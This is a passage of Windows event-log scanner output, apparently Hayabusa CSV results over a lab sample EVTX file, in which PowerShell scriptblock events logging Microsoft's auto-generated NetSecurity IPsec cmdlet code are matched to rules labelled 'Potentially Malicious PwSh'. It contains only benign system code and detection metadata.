[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_quer",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"{Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 
$__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_quer",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 